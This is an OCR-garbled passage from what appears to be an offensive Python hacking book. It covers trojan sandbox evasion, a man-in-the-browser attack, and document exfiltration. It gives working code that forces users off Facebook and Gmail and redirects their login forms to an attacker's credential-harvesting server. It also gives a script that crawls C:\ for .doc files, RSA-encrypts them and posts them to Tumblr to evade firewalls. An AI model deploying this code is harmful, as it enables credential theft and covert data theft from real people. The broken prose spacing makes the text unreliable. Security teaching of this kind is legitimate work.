mouse -c lic ks w e’re h ap py w ith b efo re c o nsid erin g o urs e lv es r u nnin g o uts id e a s a nd box. W e
ra nd om iz e th ese th re sh o ld s w ith e ach r u n, b ut y o u c an o f c o urs e s e t th re sh o ld s o f y o ur o w n b ase d o n
yo ur o w n te sti n g.
We th en r e tr ie v e th e e la p se d ti m e
➋ s in ce s o m e f o rm o f u se r i n p ut h as b een r e gis te re d o n th e s y ste m ,
and i f w e f e el th at i t’ s b een to o l o ng s in ce w e’v e s e en i n p ut ( b ase d o n h o w th e i n fe cti o n to ok p la ce a s
menti o ned p re v io usly ), w e b ail o ut a nd th e tr o ja n d ie s. I n ste ad o f d yin g h ere , y o u c o uld a ls o c ho ose
to d o s o m e i n no cuo us a cti v ity s u ch a s r e ad in g r a nd om r e gis tr y k eys o r c heckin g f ile s. A fte r w e p ass
th is i n iti a l c heck, w e m ove o n to o ur p rim ary k eystr o ke a nd m ouse -c lic k d ete cti o n l o op.
We f ir s t c heck f o r k eyp re sse s o r m ouse -c lic ks
➌ a nd w e k no w th at i f th e f u ncti o n r e tu rn s a v alu e, i t
is th e ti m esta m p o f w hen th e m ouse -c lic k o ccurre d . N ext w e c alc ula te th e ti m e e la p se d b etw een
mouse -c lic ks
➍ a nd th en c o m pare i t to o ur th re sh o ld
➎ to d ete rm in e w heth er i t w as a d oub le -c lic k.
Alo ng w ith d oub le -c lic k d ete cti o n, w e’re l o okin g to s e e i f th e s a nd box o pera to r h as b een s tr e am in g
clic k e v ents
➏ i n to th e s a nd box to tr y to f a ke o ut s a nd box d ete cti o n te chniq ues. F or e xam ple , i t
would b e r a th er o dd to s e e 1 00 d oub le -c lic ks i n a r o w d urin g ty p ic al c o m pute r u sa ge. I f th e m axim um
num ber o f d oub le -c lic ks h as b een r e ached a nd th ey h ap pened i n r a p id s u ccessio n
➐ , w e b ail o ut. O ur
fin al s te p i s to s e e i f w e h av e m ad e i t th ro ugh a ll o f th e c hecks a nd r e ached o ur m axim um n um ber o f
clic ks, k eystr o kes, a nd d oub le -c lic ks
➑ ; i f s o , w e b re ak o ut o f o ur s a nd box d ete cti o n f u ncti o n.
I e nco ura ge y o u to tw eak a nd p la y w ith th e s e tti n gs, a nd to a d d a d diti o nal f e atu re s s u ch a s v ir tu al
machin e d ete cti o n. I t m ig ht b e w orth w hile to tr a ck ty p ic al u sa ge i n te rm s o f m ouse -c lic ks, d oub le -
clic ks, a nd k eystr o kes a cro ss a f e w c o m pute rs th at y o u o w n ( I m ean p osse ss — n o t o nes th at y o u
hacked i n to !) to s e e w here y o u f e el th e h ap py s p ot i s . D ep end in g o n y o ur ta rg et, y o u m ay w ant m ore
para no id s e tti n gs o r y o u m ay n o t b e c o ncern ed w ith s a nd box d ete cti o n a t a ll. U sin g th e to ols th at y o u
dev elo ped i n th is c hap te r c an a ct a s a b ase l a yer o f f e atu re s to r o ll o ut i n y o ur tr o ja n, a nd d ue to th e
modula rity o f o ur tr o ja nin g f r a m ew ork , y o u c an c ho ose to d ep lo y a ny o ne o f th em .
[ 17
]
Dow nlo ad P yH ook h ere :
http ://s o urc efo rg e.n et/p ro je cts /p yh ook/
.
[ 18
]
To le arn a ll a bout d evic e c onte xts a nd G D I p ro gra m min g, v is it th e M SD N p age h ere :
http ://m sd n.m ic ro so ft.c o m /e n -
us/lib ra ry /w in dow s/d esk to p/d d183553(v = vs.8 5).a sp x
.
[ 19
]
As C A NVA S is a c om merc ia l to ol, ta ke a lo ok a t th is tu to ria l f o r g enera tin g M eta sp lo it p ay-lo ads h ere :
http ://w ww.o ffe n siv e-
se cu rity .c o m /m eta sp lo it- u nle a sh ed /G en era tin g_P aylo ads
.

Chap te r 9 . F un w it h I n te rn et E xp lo re r
Win d ow s C O M a uto m ati o n s e rv es a n um ber o f p ra cti c al u se s, f r o m i n te ra cti n g w ith n etw ork -b ase d
se rv ic es to e m bed din g a M ic ro so ft E xcel s p re ad sh eet i n to y o ur o w n a p plic ati o n. A ll v ers io ns o f
Win d ow s f r o m X P f o rw ard a llo w y o u to e m bed a n I n te rn et E xp lo re r C O M o bje ct i n to a p plic ati o ns,
and w e’ll ta ke a d vanta ge o f th is a b ility i n th is c hap te r. U sin g th e n ati v e I E a uto m ati o n o bje ct, w e’ll
cre ate a m an-in -th e b ro w se r-s ty le a tta ck w here w e c an s te al c re d enti a ls f r o m a w eb site w hile a u se r
is i n te ra cti n g w ith i t. W e’ll m ake th is c re d enti a l- s te alin g a tta ck e xte nd ab le , s o th at s e v era l ta rg et
web site s c an b e h arv este d . T he l a st s te p w ill u se I n te rn et E xp lo re r a s a m eans to e xfiltr a te d ata f r o m
a ta rg et s y ste m . W e’ll i n clu d e s o m e p ub lic k ey c ry p to to p ro te ct th e e xfiltr a te d d ata s o th at o nly w e
can d ecry p t i t.
In te rn et E xp lo re r, y o u s a y? E ven th o ugh o th er b ro w se rs l ik e G oogle C hro m e a nd M ozilla F ir e fo x a re
more p opula r th ese d ays, m ost c o rp ora te e nv ir o nm ents s ti ll u se I n te rn et E xp lo re r a s th eir d efa ult
bro w se r. A nd o f c o urs e , y o u c an’t r e m ove I n te rn et E xp lo re r f r o m a W in d ow s s y ste m — s o th is
te chniq ue s h o uld a lw ays b e a v aila b le to y o ur W in d ow s tr o ja n.

Man -in -th e-B ro w se r ( K in d O f)
Man-in -th e-b ro w se r ( M itB )
a tta cks h av e b een a ro und s in ce th e tu rn o f th e n ew m ille nniu m . T hey a re
a v aria ti o n o n th e c la ssic m an-in -th e-m id dle a tta ck. I n ste ad o f a cti n g i n th e m id dle o f a
co m munic ati o n, m alw are i n sta lls i ts e lf a nd s te als c re d enti a ls o r s e nsiti v e i n fo rm ati o n f r o m th e
unsu sp ecti n g ta rg et’ s b ro w se r. M ost o f th ese m alw are s tr a in s ( ty p ic ally c alle d
Bro w se r H elp er
Obje cts
) i n se rt th em se lv es i n to th e b ro w se r o r o th erw is e i n je ct c o de s o th at th ey c an m anip ula te th e
bro w se r p ro cess i ts e lf. A s b ro w se r d ev elo pers b eco m e w is e to th ese te chniq ues a nd a nti v ir u s
vend ors i n cre asin gly l o ok f o r th is b ehav io r, w e h av e to g et a b it s n eakie r. B y l e v era gin g th e n ati v e
CO M i n te rfa ce to I n te rn et E xp lo re r, w e c an c o ntr o l a ny I E s e ssio n i n o rd er to g et c re d enti a ls f o r
so cia l n etw ork in g s ite s o r e m ail l o gin s. Y ou c an o f c o urs e e xte nd th is l o gic to c hange a u se r’s
passw ord o r p erfo rm tr a nsa cti o ns w ith th eir l o gged -in s e ssio n. D ep end in g o n y o ur ta rg et, y o u c an
als o u se th is te chniq ue i n c o nju ncti o n w ith y o ur k eylo gger m odule i n o rd er to f o rc e th em to r e -
auth enti c ate to a s ite w hile y o u c ap tu re th e k eystr o kes.
We’ll b egin b y c re ati n g a s im ple e xam ple th at w ill w atc h f o r a u se r b ro w sin g F aceb ook o r G mail, d e-
auth enti c ate th em , a nd th en m odify th e l o gin f o rm to s e nd th eir u se rn am e a nd p assw ord to a n H TTP
se rv er th at
we
c o ntr o l. O ur H TTP s e rv er w ill th en s im ply r e d ir e ct th em b ack to th e r e al l o gin p age.
If y o u’v e e v er d one a ny J a v aS crip t d ev elo pm ent, y o u’ll n o ti c e th at th e C O M m odel f o r i n te ra cti n g
with I E i s v ery s im ila r. W e a re p ic kin g o n F aceb ook a nd G mail b ecause c o rp ora te u se rs h av e a n asty
hab it o f b oth r e usin g p assw ord s a nd u sin g th ese s e rv ic es f o r b usin ess ( p arti c ula rly , f o rw ard in g w ork
mail to G mail, u sin g F aceb ook c hat w ith c o w ork ers , a nd s o o n). L et’ s c ra ck o pen
mitb .p y
a nd e nte r
th e f o llo w in g c o de:
import win32com.client
import time
import urlparse
import urllib
➊ data_receiver = "http://localhost:8080/"
➋ target_sites = {}
target_sites["www.facebook.com"] =
{"logout_url" : None,
"logout_form" : "logout_form",
"login_form_index": 0,
"owned" : False}
target_sites["accounts.google.com"] =
{"logout_url" : "https://accounts.google.com/
Logout?hl=en&continue=https://accounts.google.com/
ServiceLogin%3Fservice%3Dmail",
"logout_form" : None,
"login_form_index" : 0,
"owned" : False}
# use the same target for multiple Gmail domains
target_sites["www.gmail.com"] = target_sites["accounts.google.com"]
target_sites["mail.google.com"] = target_sites["accounts.google.com"]
clsid='{9BA05972-F6A8-11CF-A442-00A0C90A8F39}'

➌ windows = win32com.client.Dispatch(clsid)
These a re th e m akin gs o f o ur m an-(k in d -o f) -in -th e-b ro w se r a tta ck. W e d efin e o ur
data_receiver

varia b le a s th e w eb s e rv er th at w ill r e ceiv e th e c re d enti a ls f r o m o ur ta rg et s ite s. T his m eth o d i s
ris k ie r i n th at a w ily u se r m ig ht s e e th e r e d ir e ct h ap pen, s o a s a f u tu re h o m ew ork p ro je ct y o u c o uld

th in k o f w ays o f p ullin g c o okie s o r p ush in g th e s to re d c re d enti a ls th ro ugh th e D OM v ia a n i m age ta g
or o th er m eans th at l o ok l e ss s u sp ic io us. W e th en s e t u p a d ic ti o nary o f ta rg et s ite s
➋ th at o ur a tta ck
will s u p port. T he d ic ti o nary m em bers a re a s f o llo w s:
logout_url
i s a U RL w e c an r e d ir e ct v ia a
GET r e q uest to f o rc e a u se r to l o g o ut; th e
logout_form
i s a D OM e le m ent th at w e c an s u b m it th at
fo rc es th e l o go ut;
login_form_index
i s th e r e la ti v e l o cati o n i n th e ta rg et d om ain ’s D OM th at
co nta in s th e l o gin f o rm w e’ll m odify ; a nd th e
owned
f la g te lls u s i f w e h av e a lr e ad y c ap tu re d
cre d enti a ls f r o m a ta rg et s ite b ecause w e d on’t w ant to k eep f o rc in g th em to l o g i n r e p eate d ly o r e ls e
th e ta rg et m ig ht s u sp ect s o m eth in g i s u p . W e th en u se I n te rn et E xp lo re r’s c la ss I D a nd i n sta nti a te th e
CO M o bje ct
➌ , w hic h g iv es u s a ccess to a ll ta b s a nd i n sta nces o f I n te rn et E xp lo re r th at a re c urre ntl y
ru nnin g.
Now th at w e h av e th e s u p port s tr u ctu re i n p la ce, l e t’ s c re ate th e m ain l o op o f o ur a tta ck:
while True:
➊ for browser in windows:
url = urlparse.urlparse(browser.LocationUrl)
➋ if url.hostname in target_sites:
➌ if target_sites[url.hostname]["owned"]:
continue
# if there is a URL, we can just redirect
➍ if target_sites[url.hostname]["logout_url"]:
browser.Navigate(target_sites[url.hostname]["logout_url"])
wait_for_browser(browser)
else:
# retrieve all elements in the document
➎ full_doc = browser.Document.all
# iterate, looking for the logout form
for i in full_doc:
try:
# find the logout form and submit it
➏ if i.id == target_sites[url.hostname]["logout_form"]:
i.submit()
wait_for_browser(browser)
except:
pass
# now we modify the login form
try:
login_index = target_sites[url.hostname]["login_form_index"]
login_page = urllib.quote(browser.LocationUrl)
➐ browser.Document.forms[login_index].action = "%s%s" % (data_.
receiver, login_page)
target_sites[url.hostname]["owned"] = True
except:
pass
time.sleep(5)
This i s o ur p rim ary l o op w here w e m onito r o ur ta rg et’ s b ro w se r s e ssio n f o r th e s ite s f r o m w hic h w e
want to n ab c re d enti a ls . W e s ta rt b y i te ra ti n g th ro ugh a ll c urre ntl y r u nnin g I n te rn et E xp lo re r

obje cts ; th is i n clu d es a cti v e ta b s i n m odern I E . I f w e d is c o ver th at th e ta rg et i s v is iti n g o ne o f o ur
pre d efin ed s ite s
➋ w e c an b egin th e m ain l o gic o f o ur a tta ck. T he f ir s t s te p i s to d ete rm in e w heth er
we h av e e xecute d a n a tta ck a gain st th is s ite a lr e ad y
➌ ; i f s o , w e w on’t e xecute i t a gain . ( T his h as a

dow nsid e i n th at i f th e u se r d id n’t e nte r th eir p assw ord c o rre ctl y , y o u c an m is s th eir c re d enti a ls ; I ’ ll
le av e o ur s im plifie d s o lu ti o n a s a h o m ew ork a ssig nm ent to i m pro ve u p on.)
We th en te st to s e e i f th e ta rg et s ite h as a s im ple l o go ut U RL th at w e c an r e d ir e ct to
➍ a nd i f s o , w e
fo rc e th e b ro w se r to d o s o . I f th e ta rg et s ite ( s u ch a s F aceb ook) r e q uir e s th e u se r to s u b m it a f o rm to
fo rc e th e l o go ut, w e b egin i te ra ti n g o ver th e D OM
➎ a nd w hen w e d is c o ver th e H TM L e le m ent I D
th at i s r e gis te re d to th e l o go ut f o rm
➏ , w e f o rc e th e f o rm to b e s u b m itte d . A fte r th e u se r h as b een
re d ir e cte d to th e l o gin f o rm , w e m odify th e e nd poin t o f th e f o rm to p ost th e u se rn am e a nd p assw ord to
a s e rv er th at w e c o ntr o l
➐ , a nd th en w ait f o r th e u se r to p erfo rm a l o gin . N oti c e th at w e ta ck th e
ho stn am e o f o ur ta rg et s ite o nto th e e nd o f th e U RL o f o ur H TTP s e rv er th at c o lle cts th e c re d enti a ls .
This i s s o o ur H TTP s e rv er k no w s w hat s ite to r e d ir e ct th e b ro w se r to a fte r c o lle cti n g th e c re d enti a ls .
You’ll n o ti c e th e f u ncti o n
wait_for_browser
r e fe re nced i n a f e w s p ots a b ove, w hic h i s a s im ple
fu ncti o n th at w aits f o r a b ro w se r to c o m ple te a n
opera ti o n s u ch a s n av ig ati n g to a n ew p age o r
waiti n g f o r a p age to l o ad f u lly . L et’ s a d d th is f u ncti o nality n o w b y i n se rti n g th e f o llo w in g c o de
ab ove th e m ain l o op o f o ur s c rip t:
def wait_for_browser(browser):
# wait for the browser to finish loading a page
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1)
return
Pre tty s im ple . W e a re j u st l o okin g f o r th e D OM to b e f u lly l o ad ed b efo re a llo w in g th e r e st o f o ur
sc rip t to k eep e xecuti n g. T his a llo w s u s to c are fu lly ti m e a ny D OM m odific ati o ns o r p ars in g
opera ti o ns.

Cre a tin g t h e S erv er
Now th at w e’v e s e t u p o ur a tta ck s c rip t, l e t’ s c re ate a v ery s im ple H TTP s e rv er to c o lle ct th e
cre d enti a ls a s th ey’re s u b m itte d . C ra ck o pen a n ew f ile c alle d
cre d _se rv er.p y
a nd d ro p i n th e
fo llo w in g c o de:
import SimpleHTTPServer
import SocketServer
import urllib
class CredRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_POST(self):
➊ content_length = int(self.headers['Content-Length'])
➋ creds = self.rfile.read(content_length).decode('utf-8')
➌ print creds
➍ site = self.path[1:]
self.send_response(301)
➎ self.send_header('Location',urllib.unquote(site))
self.end_headers()
➏ server = SocketServer.TCPServer(('0.0.0.0', 8080), CredRequestHandler)
server.serve_forever()
This s im ple s n ip pet o f c o de i s o ur s p ecia lly d esig ned H TTP s e rv er. W e i n iti a liz e th e b ase
TCPServer
cla ss w ith th e I P , p ort, a nd
CredRequestHandler
c la ss
➏ th at w ill b e r e sp onsib le f o r h and lin g th e
HTTP P O ST r e q uests . W hen o ur s e rv er r e ceiv es a r e q uest f r o m th e ta rg et’ s b ro w se r, w e r e ad th e
Content-Length
h ead er
➊ to d ete rm in e th e s iz e o f th e r e q uest, a nd th en w e r e ad i n th e c o nte nts o f
th e r e q uest
➋ a nd p rin t th em o ut
➌ . W e th en p ars e o ut th e o rig in ati n g s ite ( F aceb ook, G mail, e tc .)

and f o rc e th e ta rg et b ro w se r to r e d ir e ct
➎ b ack to th e m ain p age o f th e ta rg et s ite . A n a d diti o nal
fe atu re y o u c o uld a d d h ere i s to s e nd y o urs e lf a n e m ail e v ery
ti m e c re d enti a ls a re r e ceiv ed s o th at y o u
can a tte m pt to l o g i n u sin g th e ta rg et’ s c re d enti a ls b efo re th ey h av e a c hance to c hange th eir p assw ord .
Let’ s ta ke i t f o r a s p in .

Kic k in g t h e T ir e s
Fir e u p a n ew I E i n sta nce a nd r u n y o ur
mitb .p y
a nd
cre d _se rv er.p y
s c rip ts i n s e p ara te w in d ow s. Y ou
can te st b ro w sin g a ro und to v ario us w eb site s f ir s t to m ake s u re th at y o u a re n’t s e ein g a ny o dd
behav io r, w hic h y o u s h o uld n’t. N ow b ro w se to F aceb ook o r G mail a nd a tte m pt to l o g i n . I n y o ur
cre d _se rv er.p y
w in d ow , y o u s h o uld s e e s o m eth in g l ik e th e f o llo w in g, u sin g F aceb ook a s a n e xam ple :
C:\>
python.exe cred_server.py
lsd=AVog7IRe&email=
justin@nostarch.com
&pass=
pyth0nrocks
&default_persistent=0&
timezone=180&lgnrnd=200229_SsTf&lgnjs=1394593356&locale=en_US
localhost - - [12/Mar/2014 00:03:50] "POST /www.facebook.com HTTP/1.1" 301 -
You c an c le arly s e e th e c re d enti a ls a rriv in g, a nd th e r e d ir e ct b y th e s e rv er k ic kin g th e b ro w se r b ack
to th e m ain l o gin s c re en. O f c o urs e , y o u c an a ls o p erfo rm a te st w here y o u h av e I n te rn et E xp lo re r
ru nnin g a nd y o u’re a lr e ad y l o gged i n to F aceb ook; th en tr y r u nnin g y o ur
mitb .p y
s c rip t a nd y o u c an
se e h o w i t f o rc es th e l o go ut. N ow th at w e c an n ab th e u se r’s c re d enti a ls i n th is m anner, l e t’ s s e e h o w
we c an s p aw n I E to h elp e xfiltr a te i n fo rm ati o n f r o m a ta rg et n etw ork .

IE C O M A uto m atio n f o r E xfilt r a tio n
Gain in g a ccess to a ta rg et n etw ork i s o nly a p art o f th e b attl e . T o m ake u se o f y o ur a ccess, y o u w ant to
be a b le to e xfiltr a te d ocum ents , s p re ad sh eets , o r o th er b its o f d ata o ff th e ta rg et s y ste m . D ep end in g o n
th e d efe nse m echanis m s i n p la ce, th is l a st p art o f y o ur a tta ck c an p ro ve to b e tr ic ky. T here m ig ht b e
lo cal o r r e m ote s y ste m s ( o r a c o m bin ati o n o f b oth ) th at w ork to v alid ate p ro cesse s o penin g r e m ote
co nnecti o ns, a s w ell a s w heth er th o se p ro cesse s s h o uld b e a b le to s e nd i n fo rm ati o n o r i n iti a te
co nnecti o ns o uts id e o f th e i n te rn al n etw ork . A f e llo w C anad ia n s e curity r e se arc her, K arim N ath o o,
poin te d o ut th at I E C O M a uto m ati o n h as th e w ond erfu l b enefit o f u sin g th e
Ie xp lo re .e xe
p ro cess,
whic h i s ty p ic ally tr u ste d a nd w hite lis te d , to e xfiltr a te i n fo rm ati o n o ut o f a n etw ork .
We’ll c re ate a P yth o n s c rip t th at w ill f ir s t h unt f o r M ic ro so ft W ord d ocum ents o n th e l o cal f ile sy ste m .
When a d ocum ent i s e nco unte re d , th e s c rip t w ill e ncry p t i t u sin g p ub lic k ey c ry p to gra p hy.
[ 20
]
A fte r th e
docum ent i s e ncry p te d , w e’ll a uto m ate th e p ro cess o f p osti n g th e e ncry p te d d ocum ent to a b lo g o n
tu m blr.c o m
. T his w ill e nab le u s to d ead -d ro p th e d ocum ent a nd r e tr ie v e i t w hen w e w ant to w ith o ut
anyo ne e ls e b ein g a b le to d ecry p t i t. B y
usin g a tr u ste d s ite l ik e T um blr, w e s h o uld a ls o b e a b le to
byp ass a ny b la cklis ti n g th at a f ir e w all o r p ro xy m ay h av e, w hic h m ig ht o th erw is e p re v ent u s f r o m j u st
se nd in g th e d ocum ent to a n I P a d dre ss o r w eb s e rv er th at w e c o ntr o l. L et’ s s ta rt b y p utti n g s o m e
su p porti n g f u ncti o ns i n to o ur e xfiltr a ti o n s c rip t. O pen u p
ie _ exfil.p y
a nd e nte r th e f o llo w in g c o de:
import win32com.client
import os
import fnmatch
import time
import random
import zlib
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
doc_type = ".doc"
username = "jms@bughunter.ca"
password = "justinBHP2014"
public_key = ""
def wait_for_browser(browser):
# wait for the browser to finish loading a page
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1)
return
We a re o nly c re ati n g o ur i m ports , th e d ocum ent ty p es th at w e w ill s e arc h f o r, o ur T um blr u se rn am e
and p assw ord , a nd a p la ceho ld er f o r o ur p ub lic k ey, w hic h w e’ll g enera te l a te r o n. N ow l e t’ s a d d o ur
encry p ti o n r o uti n es s o th at w e c an e ncry p t th e f ile nam e a nd f ile c o nte nts .
def encrypt_string(plaintext):
chunk_size = 256
print "Compressing: %d bytes" % len(plaintext)
➊ plaintext = zlib.compress(plaintext)
print "Encrypting %d bytes" % len(plaintext)
➋ rsakey = RSA.importKey(public_key)
rsakey = PKCS1_OAEP.new(rsakey)
encrypted = " "

offset = 0
➌ while offset < len(plaintext):
chunk = plaintext[offset:offset+chunk_size]
➍ if len(chunk) % chunk_size != 0:
chunk += " " * (chunk_size - len(chunk))
encrypted += rsakey.encrypt(chunk)
offset += chunk_size
➎ encrypted = encrypted.encode("base64")
print "Base64 encoded crypto: %d" % len(encrypted)
return encrypted
def encrypt_post(filename):
# open and read the fil e
fd = open(filename,"rb")
contents = fd.read()
fd.close()
➏ encrypted_title = encrypt_string(filename)
encrypted_body = encrypt_string(contents)
return encrypted_title,encrypted_body
Our
encrypt_post
f u ncti o n i s r e sp onsib le f o r ta kin g i n th e f ile nam e a nd r e tu rn in g b oth th e e ncry p te d
file nam e a nd th e e ncry p te d f ile c o nte nts i n b ase 6 4-e nco ded f o rm at. W e f ir s t c all th e m ain w ork ho rs e
fu ncti o n
encrypt_string
➏ , p assin g i n th e f ile nam e o f o ur ta rg et f ile w hic h w ill b eco m e th e ti tl e o f
our b lo g p ost o n T um blr. T he f ir s t s te p o f o ur
encrypt_string
f u ncti o n i s to a p ply z lib c o m pre ssio n
on th e f ile
➊ b efo re s e tti n g u p o ur R SA p ub lic k ey e ncry p ti o n o bje ct
➋ u sin g o ur g enera te d p ub lic
key. W e th en b egin l o opin g th ro ugh th e f ile c o nte nts
➌ a nd e ncry p ti n g i t i n 2 56-b yte c hunks, w hic h i s
th e m axim um s iz e f o r R SA e ncry p ti o n u sin g P yC ry p to . W hen w e e nco unte r th e l a st c hunk o f th e f ile
➍ , i f i t i s n o t 2 56 b yte s l o ng, w e p ad i t w ith s p aces to e nsu re th at w e c an s u ccessfu lly e ncry p t i t a nd
decry p t i t o n th e o th er s id e. A fte r w e b uild o ur e nti r e c ip herte xt s tr in g, w e b ase 6 4-e nco de i t

befo re r e tu rn in g i t. W e u se b ase 6 4 e nco din g s o th at w e c an p ost i t to o ur T um blr b lo g w ith o ut
pro ble m s o r w eir d e nco din g i s su es.
Now th at w e h av e o ur e ncry p ti o n r o uti n es s e t u p , l e t’ s b egin a d din g i n th e l o gic to d eal w ith l o ggin g
in a nd n av ig ati n g th e T um blr d ash b oard . U nfo rtu nate ly , th ere i s n o q uic k a nd e asy w ay o f f in d in g U I
ele m ents o n th e W eb : I s im ply s p ent 3 0 m in ute s u sin g G oogle C hro m e a nd i ts d ev elo per to ols to
in sp ect e ach H TM L e le m ent th at I n eed ed to i n te ra ct w ith .
It i s a ls o w orth n o ti n g th at th ro ugh T um blr ’s s e tti n gs p age, I tu rn ed th e e d iti n g m ode to p la in te xt,
whic h d is a b le s th eir p esk y J a v aS crip t- b ase d e d ito r. I f y o u w is h to u se a d iffe re nt s e rv ic e, th en y o u
to o w ill h av e to f ig ure o ut th e p re cis e ti m in g, D OM i n te ra cti o ns, a nd H TM L e le m ents th at a re
re q uir e d — l u ckily , P yth o n m akes th e a uto m ati o n p ie ce v ery e asy. L et’ s a d d s o m e m ore c o de!
➊ def random_sleep():
time.sleep(random.randint(5,10))
return
def login_to_tumblr(ie):
# retrieve all elements in the document
➋ full_doc = ie.Document.all
# iterate looking for the login form

for i in full_doc:
➌ if i.id == "signup_email":
i.setAttribute("value",username)
elif i.id == "signup_password":
i.setAttribute("value",password)
random_sleep()
# you can be presented with different home pages
➍ if ie.Document.forms[0].id == "signup_form":
ie.Document.forms[0].submit()
else:
ie.Document.forms[1].submit()
except IndexError, e:
pass
random_sleep()
# the login form is the second form on the page
wait_for_browser(ie)
return
We c re ate a s im ple f u ncti o n c alle d
random_sleep
➊ th at w ill s le ep f o r a r a nd om p erio d o f ti m e; th is
is d esig ned to a llo w th e b ro w se r to e xecute ta sk s th at m ig ht n o t r e gis te r e v ents w ith th e D OM to
sig nal th at th ey a re c o m ple te . I t a ls o m akes th e b ro w se r a p pear to b e a b it m ore h um an. O ur
login_to_tumblr
f u ncti o n b egin s b y r e tr ie v in g a ll e le m ents i n th e D OM
➋ , a nd l o oks f o r th e e m ail
and p assw ord f ie ld s
➌ a nd s e ts th em to th e c re d enti a ls w e p ro vid e ( d on’t f o rg et to s ig n u p a n
acco unt) . T um blr c an p re se nt a s lig htl y d iffe re nt l o gin s c re en w ith e ach v is it, s o th e n ext b it o f c o de
➍ s im ply tr ie s to f in d th e l o gin f o rm a nd s u b m it i t a cco rd in gly . A fte r th is c o de e xecute s, w e s h o uld
no w b e l o gged i n to th e T um blr d ash b oard a nd r e ad y to p ost s o m e i n fo rm ati o n. L et’ s a d d th at c o de
no w .
def post_to_tumblr(ie,title,post):
full_doc = ie.Document.all
for i in full_doc:
if i.id == "post_one":
i.setAttribute("value",title)
title_box = i
i.focus()
elif i.id == "post_two":
i.setAttribute("innerHTML",post)
print "Set text area"
i.focus()
elif i.id == "create_post":
print "Found post button"
post_form = i
i.focus()
# move focus away from the main content box
random_sleep()
➊ title_box.focus()
random_sleep()
# post the form
post_form.children[0].click()
wait_for_browser(ie)
random_sleep()
return
None o f th is c o de s h o uld l o ok v ery n ew a t th is p oin t. W e a re s im ply h unti n g th ro ugh th e D OM to f in d

where to p ost th e ti tl e a nd b ody o f th e b lo g p osti n g. T he
post_to_tumblr
f u ncti o n o nly r e ceiv es a n
in sta nce o f th e b ro w se r a nd th e e ncry p te d f ile nam e a nd f ile c o nte nts to p ost. O ne l ittl e tr ic k ( le arn ed
by o bse rv in g i n C hro m e d ev elo per to ols )
➊ i s th at w e h av e to s h ift f o cus a w ay f r o m th e m ain c o nte nt
part o f th e p ost s o th at T um blr ’s J a v aS crip t e nab le s th e P ost b utto n. T hese s u b tl e l ittl e tr ic ks a re
im porta nt to j o t d ow n a s y o u a p ply th is te chniq ue to o th er s ite s. N ow th at w e c an l o g i n a nd p ost to
Tum blr, l e t’ s p ut th e f in is h in g to uches i n p la ce f o r o ur s c rip t.
def exfiltrate(document_path):
➊ ie = win32com.client.Dispatch("InternetExplorer.Application")
➋ ie.Visible = 1
# head to tumblr and login
ie.Navigate("http://www.tumblr.com/login")
wait_for_browser(ie)
print "Logging in..."
login_to_tumblr(ie)
print "Logged in...navigating"
ie.Navigate("https://www.tumblr.com/new/text")
wait_for_browser(ie)
# encrypt the file
title,body = encrypt_post(document_path)
print "Creating new post..."
post_to_tumblr(ie,title,body)
print "Posted!"
# destroy the IE instance
➌ ie.Quit()
ie = None
return
# main loop for document discovery
# NOTE: no tab for first line of code below
➍ for parent, directories, filenames in os.walk("C:\\"):
for filename in fnmatch.filter(filenames,"*%s" % doc_type):
document_path = os.path.join(parent,filename)
print "Found: %s" % document_path
exfiltrate(document_path)
raw_input("Continue?")
Our
exfiltrate
f u ncti o n i s w hat w e w ill c all f o r e v ery d ocum ent th at w e w ant to s to re o n T um blr. I t
fir s t c re ate s a n ew i n sta nce o f th e I n te rn et E xp lo re r C O M o bje ct
➊ — a nd th e n eat th in g i s th at y o u
can s e t th e p ro cess to b e v is ib le o r n o t
➋ . F or d eb uggin g, l e av e i t s e t to
1 , b ut f o r m axim um s te alth
yo u d efin ite ly w ant to s e t i t to
0 . T his i s r e ally u se fu l i f, f o r e xam ple , y o ur tr o ja n d ete cts o th er a cti v ity
go in g o n; i n th at c ase , y o u c an s ta rt e xfiltr a ti n g d ocum ents , w hic h m ig ht h elp to f u rth er b le nd y o ur
acti v iti e s i n w ith th at o f th e u se r. A fte r w e c all a ll o f o ur h elp er f u ncti o ns, w e s im ply k ill o ur I E
in sta nce
➌ a nd r e tu rn . T he l a st b it o f o ur s c rip t
➍ i s r e sp onsib le f o r c ra w lin g th ro ugh th e
C:\
d riv e
on th e ta rg et s y ste m a nd a tte m pti n g to m atc h o ur p re se t f ile e xte nsio n (
.d oc
i n th is c ase ). E ach ti m e a
file i s f o und , w e s im ply p ass th e f u ll p ath o f th e f ile o ff to o ur
exfiltrate
f u ncti o n.
Now th at w e h av e o ur m ain c o de r e ad y to g o , w e n eed to c re ate a q uic k a nd d ir ty R SA k ey g enera ti o n
sc rip t, a s w ell a s a d ecry p ti o n s c rip t th at w e c an u se to p aste i n a c hunk o f e ncry p te d T um blr te xt a nd
re tr ie v e th e p la in te xt. L et’ s s ta rt b y o penin g
keyg en .p y
a nd e nte rin g th e f o llo w in g c o de:
from Crypto.PublicKey import RSA
new_key = RSA.generate(2048, e=65537)

public_key = new_key.publickey().exportKey("PEM")
private_key = new_key.exportKey("PEM")
print public_key
print private_key
That’ s r ig ht — P yth o n i s s o b ad -a ss th at w e c an d o i t i n a h and fu l o f l in es o f c o de. T his b lo ck o f c o de
outp uts b oth a p riv ate a nd p ub lic k ey p air. C opy th e p ub lic k ey i n to y o ur
ie _ exfil.p y
s c rip t. T hen o pen
a n ew P yth o n f ile c alle d
decry p to r.p y
a nd e nte r th e f o llo w in g c o de ( p aste th e p riv ate k ey i n to th e
private_key
v aria b le ):
import zlib
import base64
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
private_key = "###PASTE PRIVATE KEY HERE###"
➊ rsakey = RSA.importKey(private_key)
rsakey = PKCS1_OAEP.new(rsakey)
chunk_size= 256
offset = 0
decrypted = ""
➋ encrypted = base64.b64decode(encrypted)
while offset < len(encrypted):
➌ decrypted += rsakey.decrypt(encrypted[offset:offset+chunk_size])
offset += chunk_size
# now we decompress to original
➍ plaintext = zlib.decompress(decrypted)
print plaintext
Perfe ct! W e s im ply i n sta nti a te o ur R SA c la ss w ith th e p riv ate k ey
➊ a nd th en s h o rtl y th ere afte r w e
base 6 4-d eco de
➋ o ur e nco ded b lo b f r o m T um blr. M uch l ik e o ur e nco din g l o op, w e s im ply g ra b 2 56-
byte c hunks
